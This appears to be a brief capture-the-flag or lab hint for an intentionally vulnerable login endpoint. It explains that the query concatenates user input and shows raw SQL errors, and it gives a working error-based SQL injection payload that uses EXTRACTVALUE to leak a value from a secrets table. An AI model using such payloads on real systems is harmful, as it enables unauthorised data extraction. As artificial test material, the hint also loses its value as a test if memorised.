/error · sink: string-concatenated SELECT + raw exception render
Login query concatenates user input AND the app renders raw SQL errors.
Query: SELECT id, role FROM users WHERE username='<u>' AND password='<p>'. SQL errors are shown verbatim. Use EXTRACTVALUE: username=' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT value FROM secrets WHERE name='sqli-error')))--